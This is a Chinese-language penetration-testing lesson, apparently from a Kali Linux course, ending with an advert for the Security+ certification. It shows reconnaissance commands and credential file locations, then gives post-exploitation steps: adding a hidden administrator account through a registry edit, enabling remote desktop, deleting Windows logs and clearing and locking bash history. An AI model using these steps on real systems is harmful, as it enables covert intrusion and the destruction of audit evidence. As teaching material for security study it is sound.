








    whoami and who –a  

    ifconfig -a, iptables -L -n, ifconfig –a, netstat –r

    uname –a, ps aux 

    dpkg -l| head     

root@kali:~# /etc/resolv.confDNS          //域名解析的配置文件

root@kali:~# /etc/passwd       //存放用户账号

root@kali:~# /etc/shadow       //存放用户密码


 linux 里 /etc/passwd 、/etc/shadow和/etc/group 文件内容解释

一、/etc/passwd 是用户数据库,其中的域给出了用户名、加密口令和用户的其他信息

/etc/shadow文件中的记录行与/etc/passwd中的一一对应,它由pwconv命令根据/etc/passwd中的数据自动产生。它的文 件格式与/etc/passwd类似,由若干个字段组成,字段之间用“:”隔开。这些字段是:














#cat /etc/shadow





useradd -g mysql -d /home/test -m test(:新建一个用户test, 属于mysql组,开始目录是/home/test)

然后进入 /etc/passwd,可以看到如下信息,在最后一行可以看到刚加的用户的信息。如下

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin





haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
















shadow 是 passwd 的影子文件。

在linux中,口令文件在/etc/passwd中,早期的这个文件直接存放加密后的密码,前两位是"盐"值,是一个随机数,后面跟的是加密的密码。为了安全,现在的linux都提供了 /etc/shadow这个影子文件,密码放在这个文件里面,并且是只有root可读的。







passwd test

[root@localhost etc]# passwd test

Changing password for user test.

New UNIX password:

Retype new UNIX password:

passwd: all authentication tokens updated successfully.

[root@localhost etc]#


















Unix 系统最初是用明文保存密码的,后来由于安全的考虑,采用crypt()算法加密密码并存放在/etc/passwd文件。现在,由 于计算机处理能力的提高,使密码破解变得越来越容易。/etc/passwd文件是所有合法用户都可访问的,大家都可互相看到密码的加密字符串,这给系统 带来很大的安全威胁。现代的Unix系统使用影子密码系统,它把密码从/etc/pa sswd文件中分离出来,真正的密码保存在/etc/shadow文件中,shadow文件只能由超级用户访问。这样***者就不能获得加密密码串,用于破 解。使用shadow密码文件后,/etc/passwd文件中所有帐户的password域的内容为"x",如果password域的内容为"*",则 该帐号被停用。使用passwd这个程序可修改用户的密码。


root@kali:~# ifconfig -a           //显示系统中所有接口信息

root@kali:~# iptables -L -n    //防火墙配置

root@kali:~# netstat -rn  //查看当前路由的设置

root@kali:~# uname -a    //查看当前系统的版本

root@kali:~# ps aux   //查看进程

root@kali:~# dpkg -l| head    //所有的安装包



    ipconfig /all , ipconfig /displaydns, netstat -bnao , netstat –r 

    net view , net view /domain  

    net user /domain, net user %username% /domain    

    net accounts, net share  

    net localgroup administrators username /add  

    net group "Domain Controllers" /domain  

    net share name$=C:\ /unlimited  

    net user username /active:yes/domain   

C:\Documents and Settings\Administrator>cd\

C:\>ipconfig /?

C:\>ipconfig /displaydns


┃    wmic nicconfig get ipaddress,macaddress   

┃    wmic computersystem get username     

┃    wmic netlogin get name,lastlogon        

┃    wmic process get caption, executablepath,commandline         

┃    wmic process where name=“calc.exe" call terminate    

┃    wmic os get name,servicepackmajorversion    

┃    wmic product get name,version   

┃    wmic product where name=“name” call uninstall /nointeractive  

┃    wmic share get /ALL   

┃    wmic /node:"machinename" path Win32_TerminalServiceSetting where

┃AllowTSConnections="0" call SetAllowTSConnections "1“ 

┃    wmic nteventlog get path,filename, writeable    

C:\>wmic nicconfig get ipaddress,macaddress     //读取当前系统ip地址和mac地址

C:\>wmic computersystem get username          //查看当前登录账号

C:\>wmic netlogin get name,lastlogon      //查看用户登录的信息

LastLogon                  Name

                           NT AUTHORITY\SYSTEM

                           NT AUTHORITY\LOCAL SERVICE

                           NT AUTHORITY\NETWORK SERVICE

20150922182758.000000+480 W2K2\Administrator

C:\>wmic process get caption, executablepath,commandline       //查看当前系统的进程

C:\>wmic process where name=“calc.exe" call terminate         //结束进程

C:\>wmic os get name,servicepackmajorversion     //提取操作系统serverpack版本

Name                                                                                     ServicepackMajorVersion

Microsoft Windows Server 2003 Enterprise Edition:C:\WINDOWS|\Device\Harddisk0\Partition1 2

C:\>wmic product get name,version        //查看系统当前安装了哪些软件

C:\>wmic product where name=“name” call uninstall /nointeractive     //卸载软件不产生任何提示

C:\>wmic share get /ALL            //共享文件夹

C:\>wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1“    //开启远程桌面(支持远程的)

C:\>wmic /node:"localhost" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1“

C:\>wmic nteventlog get path,filename, writeable   //查看当前系统日志

FileName  Path                       Vriteable

appevent  \windows\system32\config\  TRUE       //应用程序

secevent  \windows\system32\config\  TRUE       //安全性

sysevent  \windows\system32\config\  TRUE       //系统


┃    商业信息    

┃    系统信息    

┃    Linux    

┃    /etc ; /usr/local/etc   

┃    /etc/password ; /etc/shadow      

┃    .ssh ; .gnupg 公私钥   

┃    The e-mail and data files    

┃    业务数据库 ;身份认证服务器数据库 

┃    /tmp   

root@kali:~# cd .ssh/

root@kali:~/.ssh# ls


root@kali:~/.ssh# cat known_hosts


┃    windows   

┃    SAM 数据库 ; 注册表文件

┃    %SYSTEMROOT%\repair\SAM 

┃    %SYSTEMROOT%\System32\config\RegBack\SAM  

┃    业务数据库 ; 身份认证数据库 

┃    临时文件目录 

┃    UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\



┃    禁止在登陆界面显示新建账号  

┃    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows      

┃NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v uname /T


┃    del %WINDIR%\*.log /a/s/q/f   

┃    History   

┃    日志 

┃    auth.log / secure   

┃    btmp / wtmp     

┃    lastlog / faillog   

┃    其他日志和 HIDS 等      

C:\>ner user a a /add

C:\>net localgroup administrators a /add

C:\>REH ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v a /T REG_DWORD /D 0    //禁止在登陆界面显示新建账号

C:\>del %WINDIR%\*.log /a/s/q/f       //删除日志

root@kali:~# history        //命令历史

root@kali:~# ls -l .bash_history

-rw------- 1 root root 48948 9月  22 20:14 .bash_history

root@kali:~# cat .bash_history

root@kali:~# history -c   //擦除命令

root@kali:~# history

1017 history

root@kali:~# lsa

lsadump  lsar     lsattr

root@kali:~# lsattr

-------------e-- ./文档

-------------e-- ./音乐

-------------e-- ./图片

-------------e-- ./桌面

-------------e-- ./公共

-------------e-- ./下载

-------------e-- ./模板

-------------e-- ./视频

root@kali:~# cha

chacl        chage     chardet     chardet3     chardetet    chardetec3  charmap    chat   chattr

root@kali:~# chat

chat    chattr

root@kali:~# chattr -h

Usage: chattr [-RVf] [-+=aAcCdDeijsStTu] [-v version] files...

root@kali:~# man chattr

CHATTR(1)                   General Commands Manual                  CHATTR(1)


       chattr - change file attributes on a Linux file system


       chattr [ -RVf ] [ -v version ] [ mode ] files...


       chattr changes the file attributes on a Linux file system.

       The format of a symbolic mode is +-=[aAcCdDeijsStTu].

       The  operator  '+'  causes  the  selected attributes to be added to the

       existing attributes of the files; '-' causes them to  be  removed;  and

       '=' causes them to be the only attributes that the files have.

       The  letters  'aAcCdDeijsStTu' select the new attributes for the files:

       append only (a), no atime updates (A), compressed (c), no copy on write

       (C), no dump (d), synchronous directory updates (D), extent format (e),

       immutable (i), data journalling (j), secure deletion  (s),  synchronous

       updates  (S),  no tail-merging (t), top of directory hierarchy (T), and

       undeletable (u).

       The following attributes are read-only, and may be listed by  lsattr(1)

       but  not  modified  by  chattr:  compression  error (E), huge file (h),

       indexed directory (I), inline data (N), compression raw access (X), and

       compressed dirty file (Z).

       Not  all  flags  are supported or utilized by all filesystems; refer to

       filesystem-specific man pages such as btrfs(5), ext4(5), and xfs(5) for

       more filesystem-specific details.


       -R     Recursively change attributes of directories and their contents.

       -V     Be verbose with chattr's output and print the program version.

       -f     Suppress most error messages.

       -v version

              Set the file's version/generation number.


       A  file  with the 'a' attribute set can only be open in append mode for

writing.   Only   the   superuser   or   a   process   possessing   the

       CAP_LINUX_IMMUTABLE capability can set or clear this attribute.

       When a file with the 'A' attribute set is accessed, its atime record is

       not modified.  This avoids a certain amount of disk I/O for laptop sys‐


       A  file  with  the 'c' attribute set is automatically compressed on the

       disk by the kernel.  A read from this file returns  uncompressed  data.

       A  write  to this file compresses data before storing them on the disk.

       Note: please make sure to read the bugs and limitations section at  the

       end of this document.

       A  file with the 'C' attribute set will not be subject to copy-on-write

       updates.  This flag is only supported on  file  systems  which  perform

       copy-on-write.   (Note: For btrfs, the 'C' flag should be set on new or

       empty files.  If it is set on a file which already has data blocks,  it

       is undefined when the blocks assigned to the file will be fully stable.

       If the 'C' flag is set on a directory, it will have no  effect  on  the

       directory,  but  new  files  created  in that directory will the No_COW


       A file with the 'd' attribute set is not candidate for backup when  the

       dump(8) program is run.

       When  a  directory  with the 'D' attribute set is modified, the changes

       are written synchronously on  the  disk;  this  is  equivalent  to  the

       'dirsync' mount option applied to a subset of the files.

       The  'e' attribute indicates that the file is using extents for mapping

       the blocks on disk.  It may not be removed using chattr(1).

       The 'E' attribute is used by the experimental  compression  patches  to

       indicate that a compressed file has a compression error.  It may not be

       set  or  reset  using  chattr(1),  although  it  can  be  displayed  by


       The  'h' attribute indicates the file is storing its blocks in units of

       the filesystem blocksize instead of in units of sectors, and means that

       the file is (or at one time was) larger than 2TB.  It may not be set or

       reset using chattr(1), although it can be displayed by lsattr(1).

       A file with the 'i' attribute cannot be modified: it cannot be  deleted

       or  renamed,  no  link  can  be created to this file and no data can be

       written to the file.  Only the superuser or a  process  possessing  the

       CAP_LINUX_IMMUTABLE capability can set or clear this attribute.

       The  'I'  attribute is used by the htree code to indicate that a direc‐

       tory is being indexed using hashed trees.  It may not be set  or  reset

       using chattr(1), although it can be displayed by lsattr(1).

       A  file  with the 'j' attribute has all of its data written to the ext3

       or ext4 journal before  being  written  to  the  file  itself,  if  the

       filesystem  is  mounted  with  the  "data=ordered"  or "data=writeback"

       options.  When the filesystem is mounted with the "data=journal" option

       all  file  data is already journalled and this attribute has no effect.

       Only the superuser or a process possessing the  CAP_SYS_RESOURCE  capa‐

       bility can set or clear this attribute.

       A  file  with  the  'N'  attribute set indicates that the file has data

       stored inline, within the inode itself. It may  not  be  set  or  reset

       using chattr(1), although it can be displayed by lsattr(1).

       When  a  file  with  the  's'  attribute set is deleted, its blocks are

       zeroed and written back to the disk.  Note: please make  sure  to  read

       the bugs and limitations section at the end of this document.

       When  a  file  with  the 'S' attribute set is modified, the changes are

       written synchronously on the disk; this is  equivalent  to  the  'sync'

       mount option applied to a subset of the files.

       A file with the 't' attribute will not have a partial block fragment at

       the end of the file merged with  other  files  (for  those  filesystems

       which  support  tail-merging).  This is necessary for applications such

       as LILO which read the filesystem directly, and which don't  understand

       tail-merged files.  Note: As of this writing, the ext2 or ext3 filesys‐

       tems do not (yet, except in very experimental  patches)  support  tail-


       A  directory  with  the  'T'  attribute will be deemed to be the top of

       directory hierarchies for the purposes of the  Orlov  block  allocator.

       This  is  a  hint to the block allocator used by ext3 and ext4 that the

       subdirectories under this directory are not related, and thus should be

       spread  apart  for allocation purposes.   For example it is a very good

       idea to  set  the  'T'  attribute  on  the  /home  directory,  so  that

       /home/john  and  /home/mary are placed into separate block groups.  For

       directories where this attribute is not set, the Orlov block  allocator

       will try to group subdirectories closer together where possible.

       When  a  file  with  the 'u' attribute set is deleted, its contents are

       saved.  This allows the user to ask for its undeletion.   Note:  please

       make  sure  to read the bugs and limitations section at the end of this


       The 'X' attribute is used by the experimental  compression  patches  to

       indicate  that  the  raw  contents of a compressed file can be accessed

       directly.  It currently may  not  be  set  or  reset  using  chattr(1),

       although it can be displayed by lsattr(1).

       The  'Z'  attribute  is used by the experimental compression patches to

       indicate a compressed file is dirty.  It may not be set or reset  using

       chattr(1), although it can be displayed by lsattr(1).


       chattr was written by Remy Card <Remy.Card@linux.org>.  It is currently

       being maintained by Theodore Ts'o <tytso@alum.mit.edu>.


       The 'c', 's',  and 'u' attributes are not honored by  the  ext2,  ext3,

       and  ext4 filesystems as implemented in the current mainline Linux ker‐


       The 'j' option is only useful if the filesystem is mounted as  ext3  or


       The 'D' option is only useful on Linux kernel 2.5.19 and later.


       chattr  is  part  of  the  e2fsprogs  package  and  is  available  from



       lsattr(1), btrfs(5), ext4(5), xfs(5).

E2fsprogs version 1.42.12         August 2014                        CHATTR(1)

root@kali:~# chattr +i .bash_history

root@kali:~# lsattr .bash_history

----i--------e-- .bash_history

root@kali:~# chattr -i .bash_history

root@kali:~# rm .bash_history

root@kali:~# touch .bash_history   //添加文件

root@kali:~# chattr +i .bash_history

root@kali:~# lastb

root     :0           :0               Mon Oct 26 12:25 - 12:25  (00:00)    

root     :0           :0               Thu Oct 22 19:07 - 19:07  (00:00)    

root     :0           :0               Wed Oct 21 19:53 - 19:53  (00:00)    

root     :0           :0               Sun Oct 11 13:43 - 13:43  (00:00)    

root     :0           :0               Sun Oct  4 15:48 - 15:48  (00:00)    

root     :0           :0               Sat Oct  3 18:03 - 18:03  (00:00)    

root     :0           :0               Fri Oct  2 14:14 - 14:14  (00:00)    

root     :0           :0               Fri Oct  2 14:14 - 14:14  (00:00)   




        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。



       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。


       原因二: IT运维人员工作与翻身的利器。



